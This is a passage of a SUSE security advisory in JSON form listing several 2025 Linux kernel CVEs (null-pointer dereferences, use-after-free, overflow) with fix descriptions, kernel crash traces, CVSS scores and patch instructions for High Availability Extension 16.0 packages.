"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nneighbour: Fix null-ptr-deref in neigh_flush_dev().\n\nkernel test robot reported null-ptr-deref in neigh_flush_dev(). [0]\n\nThe cited commit introduced per-netdev neighbour list and converted\nneigh_flush_dev() to use it instead of the global hash table.\n\nOne thing we missed is that neigh_table_clear() calls neigh_ifdown()\nwith NULL dev.\n\nLet\u0027s restore the hash table iteration.\n\nNote that IPv6 module is no longer unloadable, so neigh_table_clear()\nis called only when IPv6 fails to initialise, which is unlikely to\nhappen.\n\n[0]:\nIPv6: Attempt to unregister permanent protocol 136\nIPv6: Attempt to unregister permanent protocol 17\nOops: general protection fault, probably for non-canonical address 0xdffffc00000001a0: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000d00-0x0000000000000d07]\nCPU: 1 UID: 0 PID: 1 Comm: systemd Tainted: G T 6.12.0-rc6-01246-gf7f52738637f #1\nTainted: [T]=RANDSTRUCT\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nRIP: 0010:neigh_flush_dev.llvm.6395807810224103582+0x52/0x570\nCode: c1 e8 03 42 8a 04 38 84 c0 0f 85 15 05 00 00 31 c0 41 83 3e 0a 0f 94 c0 48 8d 1c c3 48 81 c3 f8 0c 00 00 48 89 d8 48 c1 e8 03 \u003c42\u003e 80 3c 38 00 74 08 48 89 df e8 f7 49 93 fe 4c 8b 3b 4d 85 ff 0f\nRSP: 0000:ffff88810026f408 EFLAGS: 00010206\nRAX: 00000000000001a0 RBX: 0000000000000d00 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffffc0631640\nRBP: ffff88810026f470 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000\nR13: ffffffffc0625250 R14: ffffffffc0631640 R15: dffffc0000000000\nFS: 00007f575cb83940(0000) GS:ffff8883aee00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f575db40008 CR3: 00000002bf936000 CR4: 00000000000406f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n __neigh_ifdown.llvm.6395807810224103582+0x44/0x390\n neigh_table_clear+0xb1/0x268\n ndisc_cleanup+0x21/0x38 [ipv6]\n init_module+0x2f5/0x468 [ipv6]\n do_one_initcall+0x1ba/0x628\n do_init_module+0x21a/0x530\n load_module+0x2550/0x2ea0\n __se_sys_finit_module+0x3d2/0x620\n __x64_sys_finit_module+0x76/0x88\n x64_sys_call+0x7ff/0xde8\n do_syscall_64+0xfb/0x1e8\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x7f575d6f2719\nCode: 08 89 e8 5b 5d c3 66 2e 0f 1f 84 00 00 00 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d b7 06 0d 00 f7 d8 64 89 01 48\nRSP: 002b:00007fff82a2a268 EFLAGS: 00000246 ORIG_RAX: 0000000000000139\nRAX: ffffffffffffffda RBX: 0000557827b45310 RCX: 00007f575d6f2719\nRDX: 0000000000000000 RSI: 00007f575d584efd RDI: 0000000000000004\nRBP: 00007f575d584efd R08: 0000000000000000 R09: 0000557827b47b00\nR10: 0000000000000004 R11: 0000000000000246 R12: 0000000000020000\nR13: 0000000000000000 R14: 0000557827b470e0 R15: 00007f575dbb4270\n \u003c/TASK\u003e\nModules linked in: ipv6(+)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38589",
"url": "https://www.suse.com/security/cve/CVE-2025-38589"
},
{
"category": "external",
"summary": "SUSE Bug 1248366 for CVE-2025-38589",
"url": "https://bugzilla.suse.com/1248366"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38589"
},
{
"cve": "CVE-2025-38590",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38590"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Remove skb secpath if xfrm state is not found\n\nHardware returns a unique identifier for a decrypted packet\u0027s xfrm\nstate, this state is looked up in an xarray. However, the state might\nhave been freed by the time of this lookup.\n\nCurrently, if the state is not found, only a counter is incremented.\nThe secpath (sp) extension on the skb is not removed, resulting in\nsp-\u003elen becoming 0.\n\nSubsequently, functions like __xfrm_policy_check() attempt to access\nfields such as xfrm_input_state(skb)-\u003exso.type (which dereferences\nsp-\u003exvec[sp-\u003elen - 1]) without first validating sp-\u003elen. This leads to\na crash when dereferencing an invalid state pointer.\n\nThis patch prevents the crash by explicitly removing the secpath\nextension from the skb if the xfrm state is not found after hardware\ndecryption. This ensures downstream functions do not operate on a\nzero-length secpath.\n\n BUG: unable to handle page fault for address: ffffffff000002c8\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 282e067 P4D 282e067 PUD 0\n Oops: Oops: 0000 [#1] SMP\n CPU: 12 UID: 0 PID: 0 Comm: swapper/12 Not tainted 6.15.0-rc7_for_upstream_min_debug_2025_05_27_22_44 #1 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__xfrm_policy_check+0x61a/0xa30\n Code: b6 77 7f 83 e6 02 74 14 4d 8b af d8 00 00 00 41 0f b6 45 05 c1 e0 03 48 98 49 01 c5 41 8b 45 00 83 e8 01 48 98 49 8b 44 c5 10 \u003c0f\u003e b6 80 c8 02 00 00 83 e0 0c 3c 04 0f 84 0c 02 00 00 31 ff 80 fa\n RSP: 0018:ffff88885fb04918 EFLAGS: 00010297\n RAX: ffffffff00000000 RBX: 0000000000000002 RCX: 0000000000000000\n RDX: 0000000000000002 RSI: 0000000000000002 RDI: 0000000000000000\n RBP: ffffffff8311af80 R08: 0000000000000020 R09: 00000000c2eda353\n R10: ffff88812be2bbc8 R11: 000000001faab533 R12: ffff88885fb049c8\n R13: ffff88812be2bbc8 R14: 0000000000000000 R15: ffff88811896ae00\n FS: 0000000000000000(0000) GS:ffff8888dca82000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: ffffffff000002c8 CR3: 0000000243050002 CR4: 0000000000372eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cIRQ\u003e\n ? try_to_wake_up+0x108/0x4c0\n ? udp4_lib_lookup2+0xbe/0x150\n ? udp_lib_lport_inuse+0x100/0x100\n ? __udp4_lib_lookup+0x2b0/0x410\n __xfrm_policy_check2.constprop.0+0x11e/0x130\n udp_queue_rcv_one_skb+0x1d/0x530\n udp_unicast_rcv_skb+0x76/0x90\n __udp4_lib_rcv+0xa64/0xe90\n ip_protocol_deliver_rcu+0x20/0x130\n ip_local_deliver_finish+0x75/0xa0\n ip_local_deliver+0xc1/0xd0\n ? ip_protocol_deliver_rcu+0x130/0x130\n ip_sublist_rcv+0x1f9/0x240\n ? ip_rcv_finish_core+0x430/0x430\n ip_list_rcv+0xfc/0x130\n __netif_receive_skb_list_core+0x181/0x1e0\n netif_receive_skb_list_internal+0x200/0x360\n ? mlx5e_build_rx_skb+0x1bc/0xda0 [mlx5_core]\n gro_receive_skb+0xfd/0x210\n mlx5e_handle_rx_cqe_mpwrq+0x141/0x280 [mlx5_core]\n mlx5e_poll_rx_cq+0xcc/0x8e0 [mlx5_core]\n ? mlx5e_handle_rx_dim+0x91/0xd0 [mlx5_core]\n mlx5e_napi_poll+0x114/0xab0 [mlx5_core]\n __napi_poll+0x25/0x170\n net_rx_action+0x32d/0x3a0\n ? mlx5_eq_comp_int+0x8d/0x280 [mlx5_core]\n ? notifier_call_chain+0x33/0xa0\n handle_softirqs+0xda/0x250\n irq_exit_rcu+0x6d/0xc0\n common_interrupt+0x81/0xa0\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38590",
"url": "https://www.suse.com/security/cve/CVE-2025-38590"
},
{
"category": "external",
"summary": "SUSE Bug 1248360 for CVE-2025-38590",
"url": "https://bugzilla.suse.com/1248360"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38590"
},
{
"cve": "CVE-2025-38645",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38645"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Check device memory pointer before usage\n\nAdd a NULL check before accessing device memory to prevent a crash if\ndev-\u003edm allocation in mlx5_init_once() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38645",
"url": "https://www.suse.com/security/cve/CVE-2025-38645"
},
{
"category": "external",
"summary": "SUSE Bug 1248626 for CVE-2025-38645",
"url": "https://bugzilla.suse.com/1248626"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38645"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: avoid possible overflow for chunk_sectors check in blk_stack_limits()\n\nIn blk_stack_limits(), we check that the t-\u003echunk_sectors value is a\nmultiple of the t-\u003ephysical_block_size value.\n\nHowever, by finding the chunk_sectors value in bytes, we may overflow\nthe unsigned int which holds chunk_sectors, so change the check to be\nbased on sectors.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39795",
"url": "https://www.suse.com/security/cve/CVE-2025-39795"
},
{
"category": "external",
"summary": "SUSE Bug 1249609 for CVE-2025-39795",
"url": "https://bugzilla.suse.com/1249609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-39795"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
